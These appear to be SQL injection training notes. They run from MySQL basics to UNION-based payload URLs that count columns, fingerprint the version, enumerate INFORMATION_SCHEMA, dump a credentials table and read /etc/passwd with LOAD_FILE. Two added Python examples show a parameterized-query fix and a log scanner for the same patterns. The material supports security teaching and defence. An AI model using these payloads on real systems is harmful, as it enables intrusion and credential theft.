It is also possible to pass the password directly in the command, though this should be avoided, as it could leave the password in logs and the terminal history:
mysql -u <username> -p<password>
Tip: There shouldn't be any spaces between '-p' and the password.
mysql -u <username> -h <host> -P <port> -p
CREATE DATABASE users;
SHOW DATABASES;
USE users;
Note: database names are case sensitive.
CREATE TABLE logins ( id INT, username VARCHAR(100), password VARCHAR(100), date_of_joining DATETIME );
SHOW TABLES;
DESCRIBE logins;
id INT NOT NULL AUTO_INCREMENT,
username VARCHAR(100) UNIQUE NOT NULL,
date_of_joining DATETIME DEFAULT NOW(),
Columns that have default values (such as id and date_of_joining above) can be skipped when inserting a row.
Note: String and date values should be surrounded by single quotes (') or double quotes ("), while numbers can be used directly.
The % symbol acts as a wildcard and matches any sequence of characters, so admin% matches every value beginning with admin.
The _ symbol is used to match exactly one character.
SQL Operators
In MySQL terms, any non-zero value is considered true, and it usually returns the value 1 to signify true. 0 is considered false.
The AND, OR and NOT operators can also be represented as &&, || and !, respectively.
SQL Injections
For example, if we search for 1'; DROP TABLE users;, the search input would be:
We can use two types of line comments in MySQL: -- (which must be followed by a space) and #
In order to use (#) as a comment within a browser, we can use '%23', which is the URL-encoded (#) symbol.
Union
Tip: For advanced SQL injection, we may want to simply use 'NULL' to fill other columns, as 'NULL' fits all data types.
Detect Number of Columns
Using ORDER BY
Using UNION
http://SERVER_IP:PORT/search.php?port_code=' order by 1-- -
http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,2,3-- -
http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,@@version,3,4-- -
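The following is an added example, not code from the original notes: a stand-in for the search.php endpoint used above, written against an in-memory SQLite database so it runs offline (the ports table, its rows and the function names are all constructed for this illustration). It contrasts the string-concatenated query that the UNION and ORDER BY payloads above rely on with a parameterized one, and shows why a verbose database error page is what turns the ORDER BY probe into a column count.

```python
import sqlite3


# Added example: a stand-in for the page's search.php, using an in-memory
# SQLite database so it runs offline. The table and rows are constructed.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ports (id INTEGER, city TEXT, port_code TEXT)")
    conn.executemany(
        "INSERT INTO ports VALUES (?, ?, ?)",
        [(1, "Shanghai", "cn"), (2, "Rotterdam", "nl"), (3, "Singapore", "sg")],
    )
    return conn


def vulnerable_search(conn, port_code):
    """String concatenation: the input is spliced into the SQL grammar."""
    query = f"SELECT id, city, port_code FROM ports WHERE port_code = '{port_code}'"
    return conn.execute(query).fetchall()


def safe_search(conn, port_code):
    """Parameterized query: the driver passes the input as a value, never as SQL."""
    query = "SELECT id, city, port_code FROM ports WHERE port_code = ?"
    return conn.execute(query, (port_code,)).fetchall()


def column_probe(conn, n):
    """The page's ORDER BY trick: the concatenated query only survives an
    injected ORDER BY n while n is within the real column count. If the
    application echoes the database error, that count is disclosed."""
    try:
        vulnerable_search(conn, f"' order by {n}-- -")
        return True
    except sqlite3.OperationalError:
        return False


# UNION payload copied from the page's column-detection step.
PAYLOAD = "cn' UNION select 1,2,3-- -"


def demo():
    conn = build_db()
    return {
        "normal": safe_search(conn, "cn"),
        # The injected SELECT 1,2,3 comes back as an extra result row.
        "vulnerable": vulnerable_search(conn, PAYLOAD),
        # The same string is compared as a literal port code; nothing matches.
        "safe": safe_search(conn, PAYLOAD),
        # The ORDER BY probe never reaches the parser as SQL either.
        "safe_probe": safe_search(conn, "' order by 4-- -"),
        "probe_3": column_probe(conn, 3),
        "probe_4": column_probe(conn, 4),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Run it and compare the "vulnerable" and "safe" entries: the parameterized version returns no rows for the payload, and the out-of-range ORDER BY probe raises nothing from it, which is the behaviour a fix should produce. Catching database errors and returning a generic page removes the second signal.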
Database Enumeration
MySQL Fingerprinting
Payload | When to Use | Expected Output | Wrong Output
SELECT @@version | When we have full query output | MySQL version (e.g. 10.3.22-MariaDB-1ubuntu1) | In MSSQL it returns the MSSQL version. Error with other DBMS.
SELECT POW(1,1) | When we only have numeric output | 1 | Error with other DBMS
SELECT SLEEP(5) | Blind/No Output | Delays page response for 5 seconds and returns 0. | Will not delay response with other DBMS
INFORMATION_SCHEMA Database
SCHEMATA
http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,database(),2,3-- -
http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
Data
http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1, username, password, 4 from dev.credentials-- -
Reading Files
DB User
http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, user(), 3, 4-- -
http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
LOAD_FILE
Note: We will only be able to read the file if the OS user running MySQL has enough privileges to read it.
http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, LOAD_FILE('/etc/passwd'), 3, 4-- -
http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, LOAD_FILE('/var/www/html/search.php'), 3, 4-- -
Writing Files
secure_file_priv
The secure_file_priv variable controls where MySQL may read or write files: a directory path limits LOAD_FILE and file writes to that directory, an empty value leaves them unrestricted, and NULL disables them entirely.
http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name='secure_file_priv'-- -
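As an added example from the detection side (not part of the original notes), the script below scans web-server access logs for the request patterns shown throughout this page: UNION SELECT, the -- and # line comments, @@version, INFORMATION_SCHEMA, mysql.user and LOAD_FILE. The log lines are constructed for this illustration, and the query string is URL-decoded before matching so that the '%23' encoding of '#' mentioned above does not hide the comment. The indicator names and function names are my own.

```python
import re
from urllib.parse import urlparse, unquote_plus

# Constructed access-log lines (not real traffic). Lines 2-4 carry payloads
# in the form shown on this page; line 4 uses the URL-encoded '#' comment.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?port_code=cn HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /search.php?port_code=cn'%20UNION%20select%201,@@version,3,4--%20- HTTP/1.1" 200 734
10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /search.php?port_code=cn'%20UNION%20select%201,schema_name,3,4%20from%20INFORMATION_SCHEMA.SCHEMATA--%20- HTTP/1.1" 200 901
10.0.0.9 - - [01/Jan/2024:10:00:20 +0000] "GET /search.php?port_code=cn'%20UNION%20SELECT%201,LOAD_FILE('/etc/passwd'),3,4%23 HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jan/2024:10:00:25 +0000] "GET /search.php?port_code=nl HTTP/1.1" 200 498
"""

# Pulls the request target out of a combined-format log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Indicators taken from the payloads on this page. They are applied to the
# decoded query string, so %20 / %23 encoding does not defeat them.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "line_comment": re.compile(r"--\s|#"),
    "information_schema": re.compile(r"information_schema", re.I),
    "version_probe": re.compile(r"@@version", re.I),
    "file_read": re.compile(r"load_file\s*\(", re.I),
    "mysql_user_table": re.compile(r"\bmysql\.user\b", re.I),
}


def decoded_query(request_path):
    """Return the URL-decoded query string of a request target."""
    return unquote_plus(urlparse(request_path).query)


def scan_log(text):
    """Return (line_no, decoded_query, [indicator names]) for each suspicious line."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = decoded_query(match.group(1))
        hits = [name for name, rx in INDICATORS.items() if rx.search(query)]
        if hits:
            findings.append((line_no, query, hits))
    return findings


if __name__ == "__main__":
    for line_no, query, hits in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(hits)}\n    {query}")
```

Decoding before matching is the important step: a rule that looks for a literal '#' or a space after '--' in the raw log misses the encoded forms, while the decoded value is what the database actually received. The single source address repeating across lines 2-4 is the kind of sequence (version probe, schema listing, file read) worth alerting on as a whole rather than as isolated hits.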